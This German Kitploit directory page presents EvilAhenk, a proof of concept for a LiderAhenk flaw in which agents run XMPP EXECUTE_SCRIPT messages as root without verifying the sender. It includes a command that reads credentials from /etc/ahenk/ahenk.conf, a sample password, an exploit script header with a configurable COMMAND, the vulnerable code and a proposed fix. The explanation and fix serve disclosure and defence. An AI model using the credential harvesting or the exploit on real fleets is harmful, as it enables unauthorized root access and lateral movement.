Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
EvilAhenk — CVE-2026-6508 Kritische Sicherheitslücke in der LiderAhenk Merkezi Yönetim Sistemi-Architektur, die es allen Clients zwischen den Endgeräten (agents) ermöglicht, mit 'root'-Berechtigungen Code aufeinander auszuführen (unauthorized rce & lateral movement). | Kitploit
Tools/GitHubGitHub/jackalkarlos/evilahenk
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationLaterale BewegungPost-ExploitationPenetrationstestsCommand and ControlRed TeamingRemote-Access-Tool
GitHubjackalkarlos/evilahenk
23vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

EvilAhenk

CVE-2026-6508 Kritische Sicherheitslücke in der LiderAhenk Merkezi Yönetim Sistemi-Architektur, die es allen Clients zwischen den Endgeräten (agents) ermöglicht, mit 'root'-Berechtigungen Code aufeinander auszuführen (unauthorized rce & lateral movement).

Repository anzeigen

CVE-2026-6508

EvilAhenk ist eine kritische Sicherheitslücke in der Architektur des LiderAhenk Central Management Systems, die es allen Clients (Agenten) untereinander ermöglicht, Code mit 'root'-Berechtigung auf anderen auszuführen (Unauthorized RCE & Lateral Movement).

Wie das System funktioniert

Im LiderAhenk sendet die Verwaltungskonsole/der Zentralserver Aufgaben- und Richtliniennachrichten über XMPP an die Clients.

  • Das zentrale Verwaltungspanel verbindet sich mit autorisiertem Benutzer mit dem XMPP-Server,
  • Die ahenk-Agenten auf den Clients verbinden sich ebenfalls mit derselben XMPP-Infrastruktur,
  • Die Zentrale sendet Nachrichten wie EXECUTE_POLICY, EXECUTE_TASK oder EXECUTE_SCRIPT an den Ziel-Client
  • Der Client-Agent empfängt und führt diese Nachrichten aus

XMPP ist hier also der Transportkanal für den Verwaltungsverkehr. Die Befehle des zentralen Panels gehen normalerweise über diesen Kanal zu den Clients.

Unterschied zwischen erwartetem und anfälligem Ablauf

Erwarteter Ablauf:

root@kitploit:~
Lider/Ahenk yonetim paneli -> XMPP sunucusu -> hedef agent

Anfälliger Ablauf:

  • ct-2 ist ein gültiger Client, der mit demselben XMPP-Server verbunden ist
  • ct-2 sendet eine EXECUTE_SCRIPT-Nachricht über den XMPP-Server, die auf die JID von ct-1 abzielt
  • Der XMPP-Server leitet die Nachricht an ct-1 weiter
  • ct-1 führt den Befehl aus, ohne zu überprüfen, ob die Nachricht tatsächlich von lider_sunucu stammt
  • Der Befehl wird als root ausgeführt, da ahenk.service als root läuft
root@kitploit:~
ct-2 veya baska bir XMPP hesabi -> XMPP sunucusu -> ct-1 agent -> root komut

Wir hacken also nicht die XMPP-Ebene. Der XMPP-Server führt eine normale Nachrichtenweiterleitung durch. Das Problem ist, dass der Ahenk-Agent auf der ct-1-Seite nicht überprüft, ob die eingehende Nachricht tatsächlich von einem autorisierten Verwaltungskonto stammt.

PoC

root@kitploit:~
pip install slixmpp

Auf einem kompromittierten und mit dem zentralen Verwaltungssystem verbundenen Client werden die folgenden Informationen gesammelt:

root@kitploit:~
sudo grep -E '^(uid|password|host|port|servicename|receiverjid|use_tls)' /etc/ahenk/ahenk.conf

Beispielausgabe;

root@kitploit:~
uid = pardus-ct-2
password = e0c5a52e-36c2-31fc-ad0b-e9ceabbf3401
host = 192.168.100.13
port = 5222
use_tls = false
receiverjid = lider_sunucu
servicename = im.liderahenk.org

Wir aktualisieren die main.py-Datei entsprechend den erhaltenen Informationen: Domain im.liderahenk.org, Ziel-UID pardus-ct-1

root@kitploit:~
- XMPP user: `[email protected]`
- XMPP password: `e0c5a52e-36c2-31fc-ad0b-e9ceabbf3401`
- XMPP host: `192.168.100.13`
- XMPP port: `5222`
- Standardziel: `[email protected]`

Der Befehl, der auf der Zielmaschine ausgeführt werden soll, kann durch Ändern der Variablen COMMAND angepasst werden.

root@kitploit:~
root@pardus-ct-2:/home/pardus-ct-2# cat xp.py | head -n 11
#!/usr/bin/env python3
import asyncio
import json
from slixmpp import ClientXMPP

XMPP_USER = "[email protected]"
XMPP_PASS = "e0c5a52e-36c2-31fc-ad0b-e9ceabbf3401"
TARGET_JID = "[email protected]"
XMPP_HOST = "192.168.100.13"
XMPP_PORT = 5222
COMMAND = "id > /tmp/who; false"

Anfälliger Code

In repos/ahenk/src/base/messaging/messenger.py wird die eingehende Nachricht nur anhand des type-Feldes verarbeitet. Es gibt keine Überprüfung des autorisierten Absenders für msg['from']:

root@kitploit:~
def recv_direct_message(self, msg):
    if msg['type'] in ['normal']:
        j = json.loads(str(msg['body']))
        message_type = j['type']
        self.event_manger.fireEvent(message_type, str(msg['body']))

In repos/ahenk/src/base/execution/execution_manager.py führt EXECUTE_SCRIPT direkt zur Befehlsausführung:

root@kitploit:~
def execute_script(self, arg):
    json_data = json.loads(arg)
    result_code, p_out, p_err = Util.execute(str(json_data['command']))

Die Kombination dieser beiden Teile hat folgende Auswirkung:

  • Der XMPP-Server leitet die Nachricht an das Ziel weiter
  • Der Opfer-Agent löst das EXECUTE_SCRIPT-Ereignis aus, ohne den Absender zu verifizieren
  • Der Befehl wird als root ausgeführt

Möglicher Design-Fix;

root@kitploit:~
def recv_direct_message(self, msg):
    if msg['type'] != 'normal':
        return

    allowed_sender = self.receiver.split('/')[0]
    actual_sender = msg['from'].bare
    if actual_sender != allowed_sender:
        self.logger.warning("Rejected message from %s", actual_sender)
        return

    j = json.loads(str(msg['body']))
    self.event_manger.fireEvent(j['type'], str(msg['body']))
Tool herunterladen